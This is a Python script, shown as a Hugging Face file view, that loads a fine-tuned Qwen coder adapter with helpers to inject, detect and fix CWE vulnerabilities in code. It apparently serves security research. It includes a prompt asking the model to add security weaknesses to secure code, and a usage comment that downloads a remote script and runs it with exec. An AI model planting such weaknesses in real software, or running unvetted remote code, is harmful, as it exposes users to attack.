File size: 6,425 Bytes
1c74917
 
788e808
1c74917
50cf61f
1c74917
bbca78e
dc3586a
bbca78e
 
 
 
 
50cf61f
1c74917
8a8e78a
 
 
 
bd49c1b
8a8e78a
bbca78e
8a4230c
8a8e78a
bbca78e
 
 
 
 
 
8a4230c
bbca78e
 
 
 
 
 
 
 
 
8a8e78a
 
 
bbca78e
8a8e78a
dc3586a
fa6970c
bbca78e
8a8e78a
 
 
 
 
 
 
 
 
 
 
 
 
 
fa6970c
8a8e78a
 
 
 
 
 
 
 
 
dc3586a
 
 
84b9d97
dc3586a
90e8b93
0a4b368
dc3586a
50cf61f
df3eee1
50cf61f
2195783
ea2db3e
bbca78e
25d4ffa
788e808
 
 
 
 
05957a2
788e808
 
 
 
 
 
 
 
 
dc3586a
788e808
 
 
 
 
 
 
 
 
dc3586a
 
788e808
 
05957a2
938bccc
788e808
 
 
 
be51544
 
788e808
d6b75b0
788e808
 
 
05957a2
788e808
 
 
 
 
 
 
 
d6b75b0
fad23a1
938bccc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
import subprocess
import sys
import json

# Best-effort dependency bootstrap: install the runtime packages with the same
# interpreter that is executing this script and stream pip's output live.
print("🔥 Installing required packages...")

with subprocess.Popen(
    [sys.executable, "-m", "pip", "install", "-q", "transformers", "retrying", "bitsandbytes", "accelerate", "peft", "torch"],
    stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True
) as process:
    # stderr is merged into stdout, so warnings and errors show up in order.
    for line in process.stdout:
        print(line, end='')
    _pip_exit_code = process.wait()

if _pip_exit_code == 0:
    print("🕵️ Packages seems to be fine, now loading model...")
else:
    # Stay best-effort (the packages may already be installed), but do not
    # claim success when pip reported a failure.
    print(f"⚠️ pip exited with code {_pip_exit_code}; packages may be missing, trying to load the model anyway...")
        
import ast
import re
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig
from retrying import retry

# 8-bit bitsandbytes quantization settings; only passed to the base model
# when the script runs inside Google Colab (see the load call below).
bnb_config = BitsAndBytesConfig(load_in_8bit=True)

# Detect Google Colab. `get_ipython` only exists under IPython, so a NameError
# means a plain Python interpreter. This avoids probing `__builtins__` with
# hasattr(), which silently fails when `__builtins__` is a dict (the case in
# any module other than `__main__`).
try:
    RunningInCOLAB = 'google.colab' in str(get_ipython())
except NameError:
    RunningInCOLAB = False

# Load tokenizer
_tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-Coder-7B-Instruct")

# Load model with quantization (quantized only in Colab, full precision otherwise)
base_model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-Coder-7B-Instruct",
    quantization_config=bnb_config if RunningInCOLAB else None,
    device_map="auto",
)

# Load the fine-tuned model (PEFT adapter applied on top of the base model)
_model = PeftModel.from_pretrained(
    base_model,
    "SushantGautam/vulnerability_ativ0.1",
    device_map="auto",
)

def extract_dict(text):
    """Parse the first ```python fenced block in *text* as a Python literal.

    Returns the evaluated literal, or an empty dict when *text* contains no
    such fenced block. Errors raised by ``ast.literal_eval`` for a malformed
    literal propagate to the caller.
    """
    fenced = re.search(r"```python\n(.*?)\n```", text, re.DOTALL)
    if fenced is None:
        return {}
    literal_source = fenced.group(1)
    return ast.literal_eval(literal_source)

@retry(stop_max_attempt_number=5)
def generate(prompt, max_new_tokens=4000):
    """Send *prompt* to the fine-tuned model and return its validated answer.

    The prompt is wrapped in a chat template with a fixed system message,
    the model generates up to *max_new_tokens* new tokens, and the reply is
    parsed with ``extract_dict``.

    Args:
        prompt: User message to send to the model.
        max_new_tokens: Upper bound on the number of generated tokens.

    Returns:
        ``{"raw": <decoded reply text>, "extracted": <parsed dict>}``.

    Raises:
        Exception: when the reply cannot be parsed into a dict containing a
            ``'code'`` or ``'vulnerability'`` key (with ``'vulnerability'``
            being a list). The ``retry`` decorator is configured with
            ``stop_max_attempt_number=5``, so callers only see this once all
            attempts have failed.
    """
    model, tokenizer = _model, _tokenizer
    messages = [
        {"role": "system", "content": "You are a cybersecurity expert specializing in CWE vulnerabilities in codes. Your responses must be accompanied by a python JSON."},
        {"role": "user", "content": prompt},
    ]

    text = tokenizer.apply_chat_template(
        messages,
        tokenize=False,
        add_generation_prompt=True
    )

    model_inputs = tokenizer([text], return_tensors="pt").to(model.device)
    generated_ids = model.generate(
        **model_inputs,
        max_new_tokens=max_new_tokens,
    )
    # Drop the echoed prompt tokens so only the newly generated part is decoded.
    generated_ids = [
        output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
    ]

    response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]

    try:
        response_formatted = extract_dict(response)
        # Explicit checks instead of `assert`, which is stripped under `python -O`.
        if not isinstance(response_formatted, dict):
            raise ValueError("extracted literal is not a dict")
        if "code" not in response_formatted and "vulnerability" not in response_formatted:
            raise ValueError("neither 'code' nor 'vulnerability' key is present")
        if "vulnerability" in response_formatted and not isinstance(response_formatted["vulnerability"], list):
            raise ValueError("'vulnerability' is not a list")
    except Exception as err:
        # `except Exception` (not a bare except) so KeyboardInterrupt and
        # SystemExit are not converted into a retryable parsing failure.
        print('⚠️ Failed to extract dict properly from response. Retrying...')
        raise Exception(f"❌ Failed to extract dict properly from response after five tries: {response}") from err
    return {"raw": response, "extracted": response_formatted}

# Load-time smoke test: send one trivial prompt through generate() so that a
# broken model/tokenizer setup surfaces here. The call is not wrapped in a
# try block, so an exception from generate() stops the script at this point.
print("🎉 Model and tokenizer loaded successfully. Now, making sure the model responses: Ping!")
generate("Return JSON with keys 'code' and 'vulnerability', where 'code' is None and 'vulnerability' is an empty list.")
print('💪🏆🎉 Pong! Model responded successfully. Use generate("<prompt>") to call the model.')

# prompt = "Here's a properly secured code snippet:\n\ndef add_label options, f, attr\n    label_size = options.delete(:label_size) || \"col-md-2\"\n    required_mark = check_required(options, f, attr)\n    label = options[:label] == :none ? '' : options.delete(:label)\n    label ||= ((clazz = f.object.class).respond_to?(:gettext_translation_for_attribute_name) &&\n        s_(clazz.gettext_translation_for_attribute_name attr)) if f\n    label = label.present? ? label_tag(attr, \"#{label}#{required_mark}\", :class => label_size + \" control-label\") : ''\n    label\n  end\n\nYour task is to introduce the mentioned security weaknesses: Create a vulnerable version of this code by adding security risks. Provide the modified script under 'code' and list security issues under 'vulnerability'."

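# Usage (requires `import requests` first; the "_x" global acts as a guard so the script is only executed once per session):
# globals().get("_x") or exec(requests.get("https://huggingface.co/SushantGautam/vulnerability_ativ0.1/raw/main/script.py").text) or globals().__setitem__("_x", "Loaded 🔥")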


def vulnerability_injection(secure_code: str, CWE_vulnerability=None):
    """Ask the model to rewrite *secure_code* so that it contains a vulnerability.

    Args:
        secure_code: Source code to be made vulnerable.
        CWE_vulnerability: Optional target weakness. Either a single value
            (e.g. ``"CWE-89"``) or a list/tuple of them, which is rendered as
            a comma-separated string in the prompt. ``None`` or an empty
            list/tuple lets the model pick any vulnerability.

    Returns:
        The value returned by ``generate`` for the constructed prompt.
    """
    # Render a sequence of CWE ids as "CWE-89, CWE-79" rather than its Python
    # repr; an empty sequence falls back to the "any vulnerability" prompt.
    target = CWE_vulnerability
    if isinstance(target, (list, tuple)):
        target = ", ".join(str(cwe) for cwe in target) or None

    if target is None:
        # Introduce any vulnerability.
        prompt = f"""
            Modify the following secure code to introduce a vulnerability.
            Secure Code:
            {secure_code}
            Your task is to introduce security weaknesses: Create a vulnerable version of this code by adding vulnerabilities.
            Return JSON with keys: 'code' (modified vulnerable code) and 'vulnerability' (list of CWE vulnerabilities if vulnerabilities introduced else empty).
            """
    else:
        # Introduce the specific requested vulnerability.
        prompt = f"""
            Modify the following secure code to introduce a {target} vulnerability.

            Secure Code:
            {secure_code}

            Your task is to introduce the mentioned security weaknesses: Create a vulnerable version of this code by adding security risks. 
            Return JSON with keys: 'code' (modified vulnerable code) and 'vulnerability' (list of CWE if vulnerabilities introduced else empty).

            """
    return generate(prompt)


def vulnerability_detection(input_code: str):
    """Ask the model which CWE vulnerabilities are present in *input_code*.

    Builds the detection prompt around the given code and forwards it to
    ``generate``, returning that call's result unchanged.
    """
    return generate(f"""
        Analyze the following code and detect if any CWE security vulnerabilities are already present.

        Code:
        {input_code}

        Identify potential vulnerabilities that already exist in the code.
        Return JSON with key: 'vulnerability' (list of detected CWE vulnerabilities or an empty list [] if no  vulnerability found).
        """)


def vulnerability_fix(insecure_code: str):
    """Ask the model for a secured version of *insecure_code*.

    Builds the fix prompt around the given code and forwards it to
    ``generate``, returning that call's result unchanged.
    """
    return generate(f"""
        Fix the security vulnerabilities in the following code.

        Vulnerable Code:
        {insecure_code}

        Your task is to fix the security vulnerabilities in the code.
        Return JSON with keys: 'code' (secure version) and 'vulnerability' (list of fixed CWE vulnerabilities if any else empty list).
        """)

# Usage banner printed once at load time. It lists four call forms covering the
# three helpers defined above (vulnerability_injection appears twice: without
# and with a CWE_vulnerability argument).
print('ƒ Four functions are available to use:\n🧩vulnerability_injection(secure_code: str)\n🧩vulnerability_injection(secure_code: str, CWE_vulnerability=["CWE-89"])\n🧩vulnerability_detection(input_code: str)\n🧩vulnerability_fix(insecure_code: str)')